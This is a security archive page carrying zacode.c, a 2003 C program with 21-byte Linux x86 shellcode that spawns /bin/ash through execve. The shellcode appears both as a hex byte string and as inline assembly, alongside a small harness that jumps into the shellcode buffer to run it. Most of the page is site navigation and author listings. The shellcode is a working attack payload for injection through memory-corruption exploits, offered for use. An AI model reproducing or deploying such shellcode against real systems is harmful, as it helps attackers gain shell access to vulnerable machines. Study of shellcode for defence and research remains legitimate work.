zacode.c

zacode.c: Posted Sep 4, 2003; Authored by zasta; 21 byte execve("/bin/ash",0,0); shellcode for the Linux x86 architecture.; tags | x86, shellcode; systems | linux; SHA-256 | 4f10a4f74dae1b5899ad95a596246c4e3188c818647cd9764035b95d4b2b1a8d; Download | Favorite | View

zacode.c

/*
 * Fri Aug 29 16:29:38 CEST 2003
 *
 * 21 byte execve("/bin/ash",0,0); shellcode for linux x86
 * by zasta (zasta@darkircop.org)
 *
 * no assumptions should work under all circumstances
 * bash has problems with null argv so we use ash 
 *
 * can be made shorter by cp /bin/ash ./a and fixing the push
 * well there are tons of ways to make shorter shellcodes
 * for example having /bin/ash\0 somewhere in memory and just "hardcoding"
 * the addr in ebx but this is just a generic example of a versatile
 * short shellcode
 *
 *
 * greetz: sorbo, #darkircop@irc.darkircop.org
 *     daphiel & m00kie (hope your honeymoon was allright... male kids!!!)
 *         hello to s0lar!!
 *
 *
 * have fun!
 *
 */

#include <unistd.h>
#include <stdio.h>       

char shellcode[] = 
      "\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
      "\x2f\x61\x73\x68\x68\x2f\x62\x69"
      "\x6e\x89\xe3\xcd\x80";

void code() {
  __asm__("
    xor %ecx,%ecx
    mul %ecx
    addb $0xb,%al
    push %edx
    push $0x6873612f
    push $0x6e69622f
    mov %esp,%ebx
    int $0x80
  ");
}

/* lets l00k l33t w00t */
void banner() {
 printf("execve(\"/bin/ash\",0,0); shellcode %d bytes (short enough? ;)\n"
  "============================================================\n\n"
  " by\n"
  "                 _\n"
  "    ______ _ ___| |_ __ _\n"
  "   |_  / _` / __| __/ _` |\n"
  "    / / (_| \\__ \\ || (_| |\n"
  "   /___\\__,_|___/\\__\\__,_|\n"
  "\t\tzasta@darkricop.org\n\n"
  "         the first italian hackgirl\n"
  "                ph34r I own even acidburn\n\n\n"
    ,strlen(shellcode));
}

int main(int argc, char *argv[]) {
  int opt;
  void (*ptr)() = (void(*)()) &shellcode[0];

  while ((opt = getopt(argc, argv,"ahs")) != EOF) {
    switch(opt) {
      default:
      case 'h':
        printf(  "Usage: %s <opts>\n"
          "-h\tThis lame message\n"
                            "-a\tLaunch asm code\n"
                            "-s\tLaunch hex code\n",argv[0]);
                          exit(0);

                   case 'a':
                     banner();
                     code();
                     exit(0); /* unreach if all goes well */ 
                   
                   case 's':
                     banner();
        (*ptr)();
        exit(0); /* ditto */
      
    }
  }
  
  /* default just launch our hex code */
  banner();
  (*ptr)();

  exit(0); /* guess the comment */
}

Top Authors In Last 30 Days

Red Hat 248 files
Ubuntu 87 files
Gentoo 31 files
Debian 19 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
jheysel-r7 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,080)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,409)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,312)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,667)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

zacode.c

zacode.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

zacode.c

Share This

zacode.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems